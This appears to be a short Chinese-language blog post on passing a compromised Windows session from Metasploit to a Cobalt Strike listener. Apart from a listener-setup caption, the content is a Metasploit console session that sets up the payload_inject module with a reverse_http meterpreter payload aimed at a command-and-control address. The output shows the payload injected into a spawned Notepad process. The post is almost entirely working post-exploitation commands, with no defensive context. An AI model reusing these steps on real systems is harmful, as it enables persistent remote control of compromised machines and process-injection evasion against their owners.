0
点赞
收藏
分享

微信扫一扫

metasploit派生一个shell给cobaltstrike

路西法阁下 2022-09-28 阅读 113

1、cobaltstrike创建监听器

metasploit派生一个shell给cobaltstrike_监听器

 

 2、metasploit派生shell

msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject

msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf5 exploit(windows/local/payload_inject) > set lhost 192.168.0.254

lhost => 192.168.0.254

msf5 exploit(windows/local/payload_inject) > set session 1

session => 1

msf5 exploit(windows/local/payload_inject) > set lport 4454

lport => 4454

msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true

disablepayloadhandler => true

msf5 exploit(windows/local/payload_inject) > exploit

[*] Running module against WIN-KNM1L8FAL1D
[*] Spawned Notepad process 2152
[*] Injecting payload into 2152
[*] Preparing 'windows/meterpreter/reverse_http' for PID 2152



举报

相关推荐

0 条评论